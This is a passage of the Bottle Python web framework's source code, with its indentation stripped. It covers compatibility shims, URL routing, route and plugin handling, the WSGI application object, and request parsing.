from tempfile import TemporaryFile
from traceback import format_exc, print_exc
from inspect import getargspec
from unicodedata import normalize
try: from simplejson import dumps as json_dumps, loads as json_lds
except ImportError: # pragma: no cover
try: from json import dumps as json_dumps, loads as json_lds
except ImportError:
try: from django.utils.simplejson import dumps as json_dumps, loads as json_lds
except ImportError:
def json_dumps(data):
raise ImportError("JSON support requires Python 2.6 or simplejson.")
json_lds = json_dumps
# We now try to fix 2.5/2.6/3.1/3.2 incompatibilities.
# It ain't pretty but it works... Sorry for the mess.
py = sys.version_info
py3k = py >= (3, 0, 0)
py25 = py < (2, 6, 0)
py31 = (3, 1, 0) <= py < (3, 2, 0)
# Workaround for the missing "as" keyword in py3k.
def _e(): return sys.exc_info()[1]
# Workaround for the "print is a keyword/function" Python 2/3 dilemma
# and a fallback for mod_wsgi (resticts stdout/err attribute access)
try:
_stdout, _stderr = sys.stdout.write, sys.stderr.write
except IOError:
_stdout = lambda x: sys.stdout.write(x)
_stderr = lambda x: sys.stderr.write(x)
# Lots of stdlib and builtin differences.
if py3k:
import http.client as httplib
import _thread as thread
from urllib.parse import urljoin, SplitResult as UrlSplitResult
from urllib.parse import urlencode, quote as urlquote, unquote as urlunquote
urlunquote = functools.partial(urlunquote, encoding='latin1')
from http.cookies import SimpleCookie
if py >= (3, 3, 0):
from collections.abc import MutableMapping as DictMixin
from types import ModuleType as new_module
else:
from collections import MutableMapping as DictMixin
from imp import new_module
import pickle
from io import BytesIO
from configparser import ConfigParser
basestring = str
unicode = str
json_loads = lambda s: json_lds(touni(s))
callable = lambda x: hasattr(x, '__call__')
imap = map
def _raise(*a): raise a[0](a[1]).with_traceback(a[2])
else: # 2.x
import httplib
import thread
from urlparse import urljoin, SplitResult as UrlSplitResult
from urllib import urlencode, quote as urlquote, unquote as urlunquote
from Cookie import SimpleCookie
from itertools import imap
import cPickle as pickle
from imp import new_module
from StringIO import StringIO as BytesIO
from ConfigParser import SafeConfigParser as ConfigParser
if py25:
msg = "Python 2.5 support may be dropped in future versions of Bottle."
warnings.warn(msg, DeprecationWarning)
from UserDict import DictMixin
def next(it): return it.next()
bytes = str
else: # 2.6, 2.7
from collections import MutableMapping as DictMixin
unicode = unicode
json_loads = json_lds
eval(compile('def _raise(*a): raise a[0], a[1], a[2]', '<py3fix>', 'exec'))
# Some helpers for string/byte handling
def tob(s, enc='utf8'):
return s.encode(enc) if isinstance(s, unicode) else bytes(s)
def touni(s, enc='utf8', err='strict'):
return s.decode(enc, err) if isinstance(s, bytes) else unicode(s)
tonat = touni if py3k else tob
# 3.2 fixes cgi.FieldStorage to accept bytes (which makes a lot of sense).
# 3.1 needs a workaround.
if py31:
from io import TextIOWrapper
class NCTextIOWrapper(TextIOWrapper):
def close(self): pass # Keep wrapped buffer open.
# A bug in functools causes it to break if the wrapper is an instance method
def update_wrapper(wrapper, wrapped, *a, **ka):
try: functools.update_wrapper(wrapper, wrapped, *a, **ka)
except AttributeError: pass
# These helpers are used at module level and need to be defined first.
# And yes, I know PEP-8, but sometimes a lower-case classname makes more sense.
def depr(message, hard=False):
warnings.warn(message, DeprecationWarning, stacklevel=3)
def makelist(data): # This is just to handy
if isinstance(data, (tuple, list, set, dict)): return list(data)
elif data: return [data]
else: return []
class DictProperty(object):
''' Property that maps to a key in a local dict-like attribute. '''
def __init__(self, attr, key=None, read_only=False):
self.attr, self.key, self.read_only = attr, key, read_only
def __call__(self, func):
functools.update_wrapper(self, func, updated=[])
self.getter, self.key = func, self.key or func.__name__
return self
def __get__(self, obj, cls):
if obj is None: return self
key, storage = self.key, getattr(obj, self.attr)
if key not in storage: storage[key] = self.getter(obj)
return storage[key]
def __set__(self, obj, value):
if self.read_only: raise AttributeError("Read-Only property.")
getattr(obj, self.attr)[self.key] = value
def __delete__(self, obj):
if self.read_only: raise AttributeError("Read-Only property.")
del getattr(obj, self.attr)[self.key]
class cached_property(object):
''' A property that is only computed once per instance and then replaces
itself with an ordinary attribute. Deleting the attribute resets the
property. '''
def __init__(self, func):
self.__doc__ = getattr(func, '__doc__')
self.func = func
def __get__(self, obj, cls):
if obj is None: return self
value = obj.__dict__[self.func.__name__] = self.func(obj)
return value
class lazy_attribute(object):
''' A property that caches itself to the class object. '''
def __init__(self, func):
functools.update_wrapper(self, func, updated=[])
self.getter = func
def __get__(self, obj, cls):
value = self.getter(cls)
setattr(cls, self.__name__, value)
return value
###############################################################################
# Exceptions and Events ########################################################
###############################################################################
class BottleException(Exception):
""" A base class for exceptions used by bottle. """
pass
###############################################################################
# Routing ######################################################################
###############################################################################
class RouteError(BottleException):
""" This is a base class for all routing related exceptions """
class RouteReset(BottleException):
""" If raised by a plugin or request handler, the route is reset and all
plugins are re-applied. """
class RouterUnknownModeError(RouteError): pass
class RouteSyntaxError(RouteError):
""" The route parser found something not supported by this router. """
class RouteBuildError(RouteError):
""" The route could not be built. """
def _re_flatten(p):
''' Turn all capturing groups in a regular expression pattern into
non-capturing groups. '''
if '(' not in p: return p
return re.sub(r'(\\*)(\(\?P<[^>]+>|\((?!\?))',
lambda m: m.group(0) if len(m.group(1)) % 2 else m.group(1) + '(?:', p)
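# Example: _re_flatten(r'(\d+)/(?P<name>\w+)') returns r'(?:\d+)/(?:\w+)';
# escaped parentheses such as r'\(' are left untouched.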
class Router(object):
''' A Router is an ordered collection of route->target pairs. It is used to
efficiently match WSGI requests against a number of routes and return
the first target that satisfies the request. The target may be anything,
usually a string, ID or callable object. A route consists of a path-rule
and a HTTP method.
The path-rule is either a static path (e.g. `/contact`) or a dynamic
path that contains wildcards (e.g. `/wiki/<page>`). The wildcard syntax
and details on the matching order are described in docs:`routing`.
'''
default_pattern = '[^/]+'
default_filter = 're'
#: The current CPython regexp implementation does not allow more
#: than 99 matching groups per regular expression.
_MAX_GROUPS_PER_PATTERN = 99
def __init__(self, strict=False):
self.rules = [] # All rules in order
self._groups = {} # index of regexes to find them in dyna_routes
self.builder = {} # Data structure for the url builder
self.static = {} # Search structure for static routes
self.dyna_routes = {}
self.dyna_regexes = {} # Search structure for dynamic routes
#: If true, static routes are no longer checked first.
self.strict_order = strict
self.filters = {
're': lambda conf:
(_re_flatten(conf or self.default_pattern), None, None),
'int': lambda conf: (r'-?\d+', int, lambda x: str(int(x))),
'float': lambda conf: (r'-?[\d.]+', float, lambda x: str(float(x))),
'path': lambda conf: (r'.+?', None, None)}
def add_filter(self, name, func):
''' Add a filter. The provided function is called with the configuration
string as parameter and must return a (regexp, to_python, to_url) tuple.
The first element is a string, the last two are callables or None. '''
self.filters[name] = func
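    # Illustrative use, following the contract described above:
    #   router.add_filter('slug', lambda conf: (r'[a-z0-9-]+', None, None))
    # registers a filter usable as <title:slug> that matches lowercase slugs
    # and performs no value conversion.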
rule_syntax = re.compile('(\\\\*)'\
'(?:(?::([a-zA-Z_][a-zA-Z_0-9]*)?()(?:#(.*?)#)?)'\
'|(?:<([a-zA-Z_][a-zA-Z_0-9]*)?(?::([a-zA-Z_]*)'\
'(?::((?:\\\\.|[^\\\\>]+)+)?)?)?>))')
def _itertokens(self, rule):
offset, prefix = 0, ''
for match in self.rule_syntax.finditer(rule):
prefix += rule[offset:match.start()]
g = match.groups()
if len(g[0])%2: # Escaped wildcard
prefix += match.group(0)[len(g[0]):]
offset = match.end()
continue
if prefix:
yield prefix, None, None
name, filtr, conf = g[4:7] if g[2] is None else g[1:4]
yield name, filtr or 'default', conf or None
offset, prefix = match.end(), ''
if offset <= len(rule) or prefix:
yield prefix+rule[offset:], None, None
def add(self, rule, method, target, name=None):
''' Add a new rule or replace the target for an existing rule. '''
anons = 0 # Number of anonymous wildcards found
keys = [] # Names of keys
pattern = '' # Regular expression pattern with named groups
filters = [] # Lists of wildcard input filters
builder = [] # Data structure for the URL builder
is_static = True
for key, mode, conf in self._itertokens(rule):
if mode:
is_static = False
if mode == 'default': mode = self.default_filter
mask, in_filter, out_filter = self.filters[mode](conf)
if not key:
pattern += '(?:%s)' % mask
key = 'anon%d' % anons
anons += 1
else:
pattern += '(?P<%s>%s)' % (key, mask)
keys.append(key)
if in_filter: filters.append((key, in_filter))
builder.append((key, out_filter or str))
elif key:
pattern += re.escape(key)
builder.append((None, key))
self.builder[rule] = builder
if name: self.builder[name] = builder
if is_static and not self.strict_order:
self.static.setdefault(method, {})
self.static[method][self.build(rule)] = (target, None)
return
try:
re_pattern = re.compile('^(%s)$' % pattern)
re_match = re_pattern.match
except re.error:
raise RouteSyntaxError("Could not add Route: %s (%s)" % (rule, _e()))
if filters:
def getargs(path):
url_args = re_match(path).groupdict()
for name, wildcard_filter in filters:
try:
url_args[name] = wildcard_filter(url_args[name])
except ValueError:
raise HTTPError(400, 'Path has wrong format.')
return url_args
elif re_pattern.groupindex:
def getargs(path):
return re_match(path).groupdict()
else:
getargs = None
flatpat = _re_flatten(pattern)
whole_rule = (rule, flatpat, target, getargs)
if (flatpat, method) in self._groups:
if DEBUG:
msg = 'Route <%s %s> overwrites a previously defined route'
warnings.warn(msg % (method, rule), RuntimeWarning)
self.dyna_routes[method][self._groups[flatpat, method]] = whole_rule
else:
self.dyna_routes.setdefault(method, []).append(whole_rule)
self._groups[flatpat, method] = len(self.dyna_routes[method]) - 1
self._compile(method)
def _compile(self, method):
all_rules = self.dyna_routes[method]
comborules = self.dyna_regexes[method] = []
maxgroups = self._MAX_GROUPS_PER_PATTERN
for x in range(0, len(all_rules), maxgroups):
some = all_rules[x:x+maxgroups]
combined = (flatpat for (_, flatpat, _, _) in some)
combined = '|'.join('(^%s$)' % flatpat for flatpat in combined)
combined = re.compile(combined).match
rules = [(target, getargs) for (_, _, target, getargs) in some]
comborules.append((combined, rules))
def build(self, _name, *anons, **query):
''' Build an URL by filling the wildcards in a rule. '''
builder = self.builder.get(_name)
if not builder: raise RouteBuildError("No route with that name.", _name)
try:
for i, value in enumerate(anons): query['anon%d'%i] = value
url = ''.join([f(query.pop(n)) if n else f for (n,f) in builder])
return url if not query else url+'?'+urlencode(query)
except KeyError:
raise RouteBuildError('Missing URL argument: %r' % _e().args[0])
def match(self, environ):
''' Return a (target, url_agrs) tuple or raise HTTPError(400/404/405). '''
verb = environ['REQUEST_METHOD'].upper()
path = environ['PATH_INFO'] or '/'
target = None
if verb == 'HEAD':
methods = ['PROXY', verb, 'GET', 'ANY']
else:
methods = ['PROXY', verb, 'ANY']
for method in methods:
if method in self.static and path in self.static[method]:
target, getargs = self.static[method][path]
return target, getargs(path) if getargs else {}
elif method in self.dyna_regexes:
for combined, rules in self.dyna_regexes[method]:
match = combined(path)
if match:
target, getargs = rules[match.lastindex - 1]
return target, getargs(path) if getargs else {}
# No matching route found. Collect alternative methods for 405 response
allowed = set([])
nocheck = set(methods)
for method in set(self.static) - nocheck:
if path in self.static[method]:
allowed.add(verb)
for method in set(self.dyna_regexes) - allowed - nocheck:
for combined, rules in self.dyna_regexes[method]:
match = combined(path)
if match:
allowed.add(method)
if allowed:
allow_header = ",".join(sorted(allowed))
raise HTTPError(405, "Method not allowed.", Allow=allow_header)
# No matching route and no alternative method found. We give up
raise HTTPError(404, "Not found: " + repr(path))
class Route(object):
''' This class wraps a route callback along with route specific metadata and
configuration and applies Plugins on demand. It is also responsible for
turing an URL path rule into a regular expression usable by the Router.
'''
def __init__(self, app, rule, method, callback, name=None,
plugins=None, skiplist=None, **config):
#: The application this route is installed to.
self.app = app
#: The path-rule string (e.g. ``/wiki/:page``).
self.rule = rule
#: The HTTP method as a string (e.g. ``GET``).
self.method = method
#: The original callback with no plugins applied. Useful for introspection.
self.callback = callback
#: The name of the route (if specified) or ``None``.
self.name = name or None
#: A list of route-specific plugins (see :meth:`Bottle.route`).
self.plugins = plugins or []
#: A list of plugins to not apply to this route (see :meth:`Bottle.route`).
self.skiplist = skiplist or []
#: Additional keyword arguments passed to the :meth:`Bottle.route`
#: decorator are stored in this dictionary. Used for route-specific
#: plugin configuration and meta-data.
self.config = ConfigDict().load_dict(config, make_namespaces=True)
def __call__(self, *a, **ka):
depr("Some APIs changed to return Route() instances instead of"\
" callables. Make sure to use the Route.call method and not to"\
" call Route instances directly.") #0.12
return self.call(*a, **ka)
@cached_property
def call(self):
''' The route callback with all plugins applied. This property is
created on demand and then cached to speed up subsequent requests.'''
return self._make_callback()
def reset(self):
''' Forget any cached values. The next time :attr:`call` is accessed,
all plugins are re-applied. '''
self.__dict__.pop('call', None)
def prepare(self):
''' Do all on-demand work immediately (useful for debugging).'''
self.call
@property
def _context(self):
depr('Switch to Plugin API v2 and access the Route object directly.') #0.12
return dict(rule=self.rule, method=self.method, callback=self.callback,
name=self.name, app=self.app, config=self.config,
apply=self.plugins, skip=self.skiplist)
def all_plugins(self):
''' Yield all Plugins affecting this route. '''
unique = set()
for p in reversed(self.app.plugins + self.plugins):
if True in self.skiplist: break
name = getattr(p, 'name', False)
if name and (name in self.skiplist or name in unique): continue
if p in self.skiplist or type(p) in self.skiplist: continue
if name: unique.add(name)
yield p
def _make_callback(self):
callback = self.callback
for plugin in self.all_plugins():
try:
if hasattr(plugin, 'apply'):
api = getattr(plugin, 'api', 1)
context = self if api > 1 else self._context
callback = plugin.apply(callback, context)
else:
callback = plugin(callback)
except RouteReset: # Try again with changed configuration.
return self._make_callback()
if not callback is self.callback:
update_wrapper(callback, self.callback)
return callback
def get_undecorated_callback(self):
''' Return the callback. If the callback is a decorated function, try to
recover the original function. '''
func = self.callback
func = getattr(func, '__func__' if py3k else 'im_func', func)
closure_attr = '__closure__' if py3k else 'func_closure'
while hasattr(func, closure_attr) and getattr(func, closure_attr):
func = getattr(func, closure_attr)[0].cell_contents
return func
def get_callback_args(self):
''' Return a list of argument names the callback (most likely) accepts
as keyword arguments. If the callback is a decorated function, try
to recover the original function before inspection. '''
return getargspec(self.get_undecorated_callback())[0]
def get_config(self, key, default=None):
''' Lookup a config field and return its value, first checking the
route.config, then route.app.config.'''
        for conf in (self.config, self.app.config):
if key in conf: return conf[key]
return default
def __repr__(self):
cb = self.get_undecorated_callback()
return '<%s %r %r>' % (self.method, self.rule, cb)
###############################################################################
# Application Object ###########################################################
###############################################################################
class Bottle(object):
""" Each Bottle object represents a single, distinct web application and
consists of routes, callbacks, plugins, resources and configuration.
Instances are callable WSGI applications.
:param catchall: If true (default), handle all exceptions. Turn off to
let debugging middleware handle exceptions.
"""
def __init__(self, catchall=True, autojson=True):
#: A :class:`ConfigDict` for app specific configuration.
self.config = ConfigDict()
self.config._on_change = functools.partial(self.trigger_hook, 'config')
self.config.meta_set('autojson', 'validate', bool)
self.config.meta_set('catchall', 'validate', bool)
self.config['catchall'] = catchall
self.config['autojson'] = autojson
#: A :class:`ResourceManager` for application files
self.resources = ResourceManager()
self.routes = [] # List of installed :class:`Route` instances.
self.router = Router() # Maps requests to :class:`Route` instances.
self.error_handler = {}
# Core plugins
self.plugins = [] # List of installed plugins.
if self.config['autojson']:
self.install(JSONPlugin())
self.install(TemplatePlugin())
#: If true, most exceptions are caught and returned as :exc:`HTTPError`
catchall = DictProperty('config', 'catchall')
__hook_names = 'before_request', 'after_request', 'app_reset', 'config'
__hook_reversed = 'after_request'
@cached_property
def _hooks(self):
return dict((name, []) for name in self.__hook_names)
def add_hook(self, name, func):
''' Attach a callback to a hook. Three hooks are currently implemented:
before_request
Executed once before each request. The request context is
available, but no routing has happened yet.
after_request
Executed once after each request regardless of its outcome.
app_reset
Called whenever :meth:`Bottle.reset` is called.
'''
if name in self.__hook_reversed:
self._hooks[name].insert(0, func)
else:
self._hooks[name].append(func)
def remove_hook(self, name, func):
''' Remove a callback from a hook. '''
if name in self._hooks and func in self._hooks[name]:
self._hooks[name].remove(func)
return True
def trigger_hook(self, __name, *args, **kwargs):
''' Trigger a hook and return a list of results. '''
return [hook(*args, **kwargs) for hook in self._hooks[__name][:]]
def hook(self, name):
""" Return a decorator that attaches a callback to a hook. See
:meth:`add_hook` for details."""
def decorator(func):
self.add_hook(name, func)
return func
return decorator
def mount(self, prefix, app, **options):
''' Mount an application (:class:`Bottle` or plain WSGI) to a specific
URL prefix. Example::
root_app.mount('/admin/', admin_app)
:param prefix: path prefix or `mount-point`. If it ends in a slash,
that slash is mandatory.
:param app: an instance of :class:`Bottle` or a WSGI application.
All other parameters are passed to the underlying :meth:`route` call.
'''
if isinstance(app, basestring):
depr('Parameter order of Bottle.mount() changed.', True) # 0.10
segments = [p for p in prefix.split('/') if p]
if not segments: raise ValueError('Empty path prefix.')
path_depth = len(segments)
def mountpoint_wrapper():
try:
request.path_shift(path_depth)
rs = HTTPResponse([])
def start_response(status, headerlist, exc_info=None):
if exc_info:
try:
_raise(*exc_info)
finally:
exc_info = None
rs.status = status
for name, value in headerlist: rs.add_header(name, value)
return rs.body.append
body = app(request.environ, start_response)
if body and rs.body: body = itertools.chain(rs.body, body)
rs.body = body or rs.body
return rs
finally:
request.path_shift(-path_depth)
options.setdefault('skip', True)
options.setdefault('method', 'PROXY')
options.setdefault('mountpoint', {'prefix': prefix, 'target': app})
options['callback'] = mountpoint_wrapper
self.route('/%s/<:re:.*>' % '/'.join(segments), **options)
if not prefix.endswith('/'):
self.route('/' + '/'.join(segments), **options)
def merge(self, routes):
''' Merge the routes of another :class:`Bottle` application or a list of
:class:`Route` objects into this application. The routes keep their
'owner', meaning that the :data:`Route.app` attribute is not
changed. '''
if isinstance(routes, Bottle):
routes = routes.routes
for route in routes:
self.add_route(route)
def install(self, plugin):
''' Add a plugin to the list of plugins and prepare it for being
applied to all routes of this application. A plugin may be a simple
decorator or an object that implements the :class:`Plugin` API.
'''
if hasattr(plugin, 'setup'): plugin.setup(self)
if not callable(plugin) and not hasattr(plugin, 'apply'):
raise TypeError("Plugins must be callable or implement .apply()")
self.plugins.append(plugin)
self.reset()
return plugin
def uninstall(self, plugin):
''' Uninstall plugins. Pass an instance to remove a specific plugin, a type
object to remove all plugins that match that type, a string to remove
all plugins with a matching ``name`` attribute or ``True`` to remove all
plugins. Return the list of removed plugins. '''
removed, remove = [], plugin
for i, plugin in list(enumerate(self.plugins))[::-1]:
if remove is True or remove is plugin or remove is type(plugin) \
or getattr(plugin, 'name', True) == remove:
removed.append(plugin)
del self.plugins[i]
if hasattr(plugin, 'close'): plugin.close()
if removed: self.reset()
return removed
def reset(self, route=None):
''' Reset all routes (force plugins to be re-applied) and clear all
caches. If an ID or route object is given, only that specific route
is affected. '''
if route is None: routes = self.routes
elif isinstance(route, Route): routes = [route]
else: routes = [self.routes[route]]
for route in routes: route.reset()
if DEBUG:
for route in routes: route.prepare()
self.trigger_hook('app_reset')
def close(self):
''' Close the application and all installed plugins. '''
for plugin in self.plugins:
if hasattr(plugin, 'close'): plugin.close()
self.stopped = True
def run(self, **kwargs):
''' Calls :func:`run` with the same parameters. '''
run(self, **kwargs)
def match(self, environ):
""" Search for a matching route and return a (:class:`Route` , urlargs)
tuple. The second value is a dictionary with parameters extracted
from the URL. Raise :exc:`HTTPError` (404/405) on a non-match."""
return self.router.match(environ)
def get_url(self, routename, **kargs):
""" Return a string that matches a named route """
scriptname = request.environ.get('SCRIPT_NAME', '').strip('/') + '/'
location = self.router.build(routename, **kargs).lstrip('/')
return urljoin(urljoin('/', scriptname), location)
def add_route(self, route):
''' Add a route object, but do not change the :data:`Route.app`
attribute.'''
self.routes.append(route)
self.router.add(route.rule, route.method, route, name=route.name)
if DEBUG: route.prepare()
def route(self, path=None, method='GET', callback=None, name=None,
apply=None, skip=None, **config):
""" A decorator to bind a function to a request URL. Example::
@app.route('/hello/:name')
def hello(name):
return 'Hello %s' % name
The ``:name`` part is a wildcard. See :class:`Router` for syntax
details.
:param path: Request path or a list of paths to listen to. If no
path is specified, it is automatically generated from the
signature of the function.
:param method: HTTP method (`GET`, `POST`, `PUT`, ...) or a list of
methods to listen to. (default: `GET`)
:param callback: An optional shortcut to avoid the decorator
syntax. ``route(..., callback=func)`` equals ``route(...)(func)``
:param name: The name for this route. (default: None)
:param apply: A decorator or plugin or a list of plugins. These are
applied to the route callback in addition to installed plugins.
:param skip: A list of plugins, plugin classes or names. Matching
plugins are not installed to this route. ``True`` skips all.
Any additional keyword arguments are stored as route-specific
configuration and passed to plugins (see :meth:`Plugin.apply`).
"""
if callable(path): path, callback = None, path
plugins = makelist(apply)
skiplist = makelist(skip)
def decorator(callback):
# TODO: Documentation and tests
if isinstance(callback, basestring): callback = load(callback)
for rule in makelist(path) or yieldroutes(callback):
for verb in makelist(method):
verb = verb.upper()
route = Route(self, rule, verb, callback, name=name,
plugins=plugins, skiplist=skiplist, **config)
self.add_route(route)
return callback
return decorator(callback) if callback else decorator
def get(self, path=None, method='GET', **options):
""" Equals :meth:`route`. """
return self.route(path, method, **options)
def post(self, path=None, method='POST', **options):
""" Equals :meth:`route` with a ``POST`` method parameter. """
return self.route(path, method, **options)
def put(self, path=None, method='PUT', **options):
""" Equals :meth:`route` with a ``PUT`` method parameter. """
return self.route(path, method, **options)
def delete(self, path=None, method='DELETE', **options):
""" Equals :meth:`route` with a ``DELETE`` method parameter. """
return self.route(path, method, **options)
def error(self, code=500):
""" Decorator: Register an output handler for a HTTP error code"""
def wrapper(handler):
self.error_handler[int(code)] = handler
return handler
return wrapper
def default_error_handler(self, res):
return tob(template(ERROR_PAGE_TEMPLATE, e=res))
def _handle(self, environ):
path = environ['bottle.raw_path'] = environ['PATH_INFO']
if py3k:
try:
environ['PATH_INFO'] = path.encode('latin1').decode('utf8')
except UnicodeError:
return HTTPError(400, 'Invalid path string. Expected UTF-8')
try:
environ['bottle.app'] = self
request.bind(environ)
response.bind()
try:
self.trigger_hook('before_request')
route, args = self.router.match(environ)
environ['route.handle'] = route
environ['bottle.route'] = route
environ['route.url_args'] = args
return route.call(**args)
finally:
self.trigger_hook('after_request')
except HTTPResponse:
return _e()
except RouteReset:
route.reset()
return self._handle(environ)
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
except Exception:
if not self.catchall: raise
stacktrace = format_exc()
environ['wsgi.errors'].write(stacktrace)
return HTTPError(500, "Internal Server Error", _e(), stacktrace)
def _cast(self, out, peek=None):
""" Try to convert the parameter into something WSGI compatible and set
correct HTTP headers when possible.
Support: False, str, unicode, dict, HTTPResponse, HTTPError, file-like,
iterable of strings and iterable of unicodes
"""
# Empty output is done here
if not out:
if 'Content-Length' not in response:
response['Content-Length'] = 0
return []
# Join lists of byte or unicode strings. Mixed lists are NOT supported
if isinstance(out, (tuple, list))\
and isinstance(out[0], (bytes, unicode)):
out = out[0][0:0].join(out) # b'abc'[0:0] -> b''
# Encode unicode strings
if isinstance(out, unicode):
out = out.encode(response.charset)
# Byte Strings are just returned
if isinstance(out, bytes):
if 'Content-Length' not in response:
response['Content-Length'] = len(out)
return [out]
# HTTPError or HTTPException (recursive, because they may wrap anything)
# TODO: Handle these explicitly in handle() or make them iterable.
if isinstance(out, HTTPError):
out.apply(response)
out = self.error_handler.get(out.status_code, self.default_error_handler)(out)
return self._cast(out)
if isinstance(out, HTTPResponse):
out.apply(response)
return self._cast(out.body)
# File-like objects.
if hasattr(out, 'read'):
if 'wsgi.file_wrapper' in request.environ:
return request.environ['wsgi.file_wrapper'](out)
elif hasattr(out, 'close') or not hasattr(out, '__iter__'):
return WSGIFileWrapper(out)
# Handle Iterables. We peek into them to detect their inner type.
try:
iout = iter(out)
first = next(iout)
while not first:
first = next(iout)
except StopIteration:
return self._cast('')
except HTTPResponse:
first = _e()
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
except Exception:
if not self.catchall: raise
first = HTTPError(500, 'Unhandled exception', _e(), format_exc())
# These are the inner types allowed in iterator or generator objects.
if isinstance(first, HTTPResponse):
return self._cast(first)
elif isinstance(first, bytes):
new_iter = itertools.chain([first], iout)
elif isinstance(first, unicode):
encoder = lambda x: x.encode(response.charset)
new_iter = imap(encoder, itertools.chain([first], iout))
else:
msg = 'Unsupported response type: %s' % type(first)
return self._cast(HTTPError(500, msg))
if hasattr(out, 'close'):
new_iter = _closeiter(new_iter, out.close)
return new_iter
def wsgi(self, environ, start_response):
""" The bottle WSGI-interface. """
try:
out = self._cast(self._handle(environ))
# rfc2616 section 4.3
if response._status_code in (100, 101, 204, 304)\
or environ['REQUEST_METHOD'] == 'HEAD':
if hasattr(out, 'close'): out.close()
out = []
start_response(response._status_line, response.headerlist)
return out
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
except Exception:
if not self.catchall: raise
err = '<h1>Critical error while processing request: %s</h1>' \
% html_escape(environ.get('PATH_INFO', '/'))
if DEBUG:
err += '<h2>Error:</h2>\n<pre>\n%s\n</pre>\n' \
'<h2>Traceback:</h2>\n<pre>\n%s\n</pre>\n' \
% (html_escape(repr(_e())), html_escape(format_exc()))
environ['wsgi.errors'].write(err)
headers = [('Content-Type', 'text/html; charset=UTF-8')]
start_response('500 INTERNAL SERVER ERROR', headers, sys.exc_info())
return [tob(err)]
def __call__(self, environ, start_response):
        ''' Each instance of :class:`Bottle` is a WSGI application. '''
return self.wsgi(environ, start_response)
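# Illustrative usage sketch for the application object defined above; the
# route path, handler name and error page below are hypothetical examples.
def _example_bottle_app():
    app = Bottle()
    @app.route('/hello/:name')
    def hello(name):
        return 'Hello %s' % name
    @app.error(404)
    def not_found(err):
        return 'Nothing here, sorry.'
    return app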
###############################################################################
# HTTP and WSGI Tools ##########################################################
###############################################################################
class BaseRequest(object):
""" A wrapper for WSGI environment dictionaries that adds a lot of
convenient access methods and properties. Most of them are read-only.
Adding new attributes to a request actually adds them to the environ
dictionary (as 'bottle.request.ext.<name>'). This is the recommended
way to store and access request-specific data.
"""
__slots__ = ('environ')
#: Maximum size of memory buffer for :attr:`body` in bytes.
MEMFILE_MAX = 102400
def __init__(self, environ=None):
""" Wrap a WSGI environ dictionary. """
#: The wrapped WSGI environ dictionary. This is the only real attribute.
#: All other attributes actually are read-only properties.
self.environ = {} if environ is None else environ
self.environ['bottle.request'] = self
@DictProperty('environ', 'bottle.app', read_only=True)
def app(self):
''' Bottle application handling this request. '''
raise RuntimeError('This request is not connected to an application.')
@DictProperty('environ', 'bottle.route', read_only=True)
def route(self):
""" The bottle :class:`Route` object that matches this request. """
raise RuntimeError('This request is not connected to a route.')
@DictProperty('environ', 'route.url_args', read_only=True)
def url_args(self):
""" The arguments extracted from the URL. """
raise RuntimeError('This request is not connected to a route.')
@property
def path(self):
''' The value of ``PATH_INFO`` with exactly one prefixed slash (to fix
broken clients and avoid the "empty path" edge case). '''
return '/' + self.environ.get('PATH_INFO','').lstrip('/')
@property
def method(self):
''' The ``REQUEST_METHOD`` value as an uppercase string. '''
return self.environ.get('REQUEST_METHOD', 'GET').upper()
@DictProperty('environ', 'bottle.request.headers', read_only=True)
def headers(self):
''' A :class:`WSGIHeaderDict` that provides case-insensitive access to
HTTP request headers. '''
return WSGIHeaderDict(self.environ)
def get_header(self, name, default=None):
''' Return the value of a request header, or a given default value. '''
return self.headers.get(name, default)
@DictProperty('environ', 'bottle.request.cookies', read_only=True)
def cookies(self):
""" Cookies parsed into a :class:`FormsDict`. Signed cookies are NOT
decoded. Use :meth:`get_cookie` if you expect signed cookies. """
cookies = SimpleCookie(self.environ.get('HTTP_COOKIE','')).values()
return FormsDict((c.key, c.value) for c in cookies)
def get_cookie(self, key, default=None, secret=None):
""" Return the content of a cookie. To read a `Signed Cookie`, the
`secret` must match the one used to create the cookie (see
:meth:`BaseResponse.set_cookie`). If anything goes wrong (missing
cookie or wrong signature), return a default value. """
value = self.cookies.get(key)
if secret and value:
dec = cookie_decode(value, secret) # (key, value) tuple or None
return dec[1] if dec and dec[0] == key else default
return value or default
@DictProperty('environ', 'bottle.request.query', read_only=True)
def query(self):
''' The :attr:`query_string` parsed into a :class:`FormsDict`. These
            values are sometimes called "URL arguments" or "GET parameters".
            They are not to be confused with "URL wildcards", which are
            provided by the :class:`Router`. '''
get = self.environ['bottle.get'] = FormsDict()
pairs = _parse_qsl(self.environ.get('QUERY_STRING', ''))
for key, value in pairs:
get[key] = value
return get
@DictProperty('environ', 'bottle.request.forms', read_only=True)
def forms(self):
""" Form values parsed from an `url-encoded` or `multipart/form-data`
encoded POST or PUT request body. The result is returned as a
:class:`FormsDict`. All keys and values are strings. File uploads
are stored separately in :attr:`files`. """
forms = FormsDict()
for name, item in self.POST.allitems():
if not isinstance(item, FileUpload):
forms[name] = item
return forms
@DictProperty('environ', 'bottle.request.params', read_only=True)
def params(self):
""" A :class:`FormsDict` with the combined values of :attr:`query` and
:attr:`forms`. File uploads are stored in :attr:`files`. """
params = FormsDict()
for key, value in self.query.allitems():
params[key] = value
for key, value in self.forms.allitems():
params[key] = value
return params
@DictProperty('environ', 'bottle.request.files', read_only=True)
def files(self):
""" File uploads parsed from `multipart/form-data` encoded POST or PUT
request body. The values are instances of :class:`FileUpload`.
"""
files = FormsDict()
for name, item in self.POST.allitems():
if isinstance(item, FileUpload):
files[name] = item
return files
@DictProperty('environ', 'bottle.request.json', read_only=True)
def json(self):
''' If the ``Content-Type`` header is ``application/json``, this
property holds the parsed content of the request body. Only requests
smaller than :attr:`MEMFILE_MAX` are processed to avoid memory
exhaustion. '''
ctype = self.environ.get('CONTENT_TYPE', '').lower().split(';')[0]
if ctype == 'application/json':
b = self._get_body_string()
if not b:
return None
return json_loads(b)
return None
def _iter_body(self, read, bufsize):
maxread = max(0, self.content_length)
while maxread:
part = read(min(maxread, bufsize))
if not part: break
yield part
maxread -= len(part)
def _iter_chunked(self, read, bufsize):
err = HTTPError(400, 'Error while parsing chunked transfer body.')
rn, sem, bs = tob('\r\n'), tob(';'), tob('')
while True:
header = read(1)
while header[-2:] != rn:
c = read(1)
header += c
if not c: raise err
if len(header) > bufsize: raise err
size, _, _ = header.partition(sem)
try:
maxread = int(tonat(size.strip()), 16)
except ValueError:
raise err
if maxread == 0: break
buff = bs
while maxread > 0:
